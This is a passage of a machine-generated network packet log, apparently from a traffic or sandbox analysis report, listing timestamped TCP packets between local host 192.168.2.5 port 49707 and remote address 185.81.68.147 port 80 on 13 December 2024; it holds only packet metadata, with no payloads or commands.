                                                                                                                                                                Dec 13, 2024 01:37:14.736154079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.736332893 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.736960888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.737066984 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.737117052 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.737878084 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.737972021 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.738061905 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.738789082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.738956928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.739037991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.739669085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.739794016 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.739861965 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.740583897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.740715981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.740777016 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.741513014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.741628885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.741686106 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.742399931 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.742526054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.742578983 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.743329048 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.743587017 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.743655920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.744224072 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.744343042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.744718075 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.745160103 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.745280027 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.745330095 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.746047020 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.746172905 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.746632099 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.746968985 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.747077942 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.747137070 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.747941971 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.747977018 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.748328924 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.748794079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.748893976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.748943090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.749696970 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.749881983 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.749931097 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.750602961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.750720024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.750768900 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.751516104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.751620054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.751667023 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.752434015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.752624989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.752700090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.753333092 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.753443003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.753501892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.754242897 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.754355907 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.754417896 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.755151033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.755264044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.755335093 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.756057024 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.756228924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.756478071 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.756968975 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.757072926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.757188082 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.757869959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.757980108 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.758033037 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.758789062 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.758889914 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.758936882 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.759701014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.759816885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.759862900 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.760601044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.760715961 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.760765076 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.761548996 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.761647940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.761694908 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.762440920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.762536049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.762584925 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.763293028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.817174911 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.907656908 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.907696962 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.907763004 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.907901049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.907977104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.908029079 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.908807039 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.908876896 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.908925056 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.909722090 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.909836054 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.909889936 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.910612106 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.910742044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.910790920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.911541939 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.911642075 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.911691904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.912411928 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.912570000 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.912744999 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.913368940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.913405895 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.913482904 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.914251089 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.914454937 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.914571047 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.915163994 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.915276051 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.915330887 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.916093111 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.916198015 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.916290998 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.917001009 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.917079926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.917140007 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.917911053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.918040991 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.918113947 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.918786049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.918916941 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.918967962 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.919723034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.919836998 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.919888020 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.920620918 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.920737028 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.920787096 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.921535969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.921633005 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.921680927 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.922451019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.922508001 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.922713041 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.923365116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.923466921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.923515081 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.924283981 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.924348116 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.924393892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.925173044 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.925278902 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.925331116 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.926095963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.926279068 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.926326036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.927012920 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.927108049 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.927164078 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.927894115 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.927989960 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.928039074 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.928803921 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.928987980 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.929038048 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.929716110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.929833889 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.929883003 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.930625916 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.930840969 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.930891991 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.931556940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.931644917 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.931690931 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.932431936 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.932538033 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.932589054 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.933365107 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.933473110 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.933521032 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.934263945 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.934396029 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.934443951 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.935158968 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.935281992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.935327053 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.936115026 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.936222076 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.936269045 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.936989069 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.937097073 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.937148094 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.937899113 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.938088894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.938141108 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.938793898 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.938896894 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.938944101 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.939698935 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.939812899 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.939857960 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.940618992 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.940737963 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.940790892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.941536903 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.941592932 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.941665888 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.942455053 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.942605019 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.942672968 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.943370104 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.943479061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.943531036 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.944259882 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.944390059 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.944545984 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.945235014 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.945298910 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.945355892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.946106911 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.946201086 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.946245909 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.947025061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.947122097 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.947166920 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.947952032 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.948082924 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.948127031 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.948837042 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.948961973 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.949008942 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.949731112 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.949841022 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.949889898 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.950629950 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.950751066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.950798988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.951590061 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.951670885 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.951783895 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.952476978 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.952557087 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.952604055 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.953372002 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.953499079 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.953550100 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.954309940 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.954380035 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:14.954427958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:14.955132008 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.004666090 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.099869013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.099894047 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.099972963 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.100003958 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.100100040 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.100162029 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.100940943 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.101047993 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.101144075 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.101839066 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.101933956 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.101990938 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.102760077 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.102853060 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.102916002 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.103671074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.103754997 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.103806019 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.104573965 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.104687929 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.104765892 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.105462074 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.105575085 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.105631113 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.106372118 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.106487989 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.106585979 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.107285976 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.107443094 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.107491970 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.108206034 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.108314037 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.108361959 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.109119892 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.109213114 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.109262943 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.110032082 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.110127926 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.110208988 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.110924959 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.111053944 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.111099958 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.111835003 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.111948013 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.111994982 CET4970780192.168.2.5185.81.68.147
                                                                                                                                                                Dec 13, 2024 01:37:15.112768888 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.112859964 CET8049707185.81.68.147192.168.2.5
                                                                                                                                                                Dec 13, 2024 01:37:15.112910986 CET4970780192.168.2.5185.81.68.147
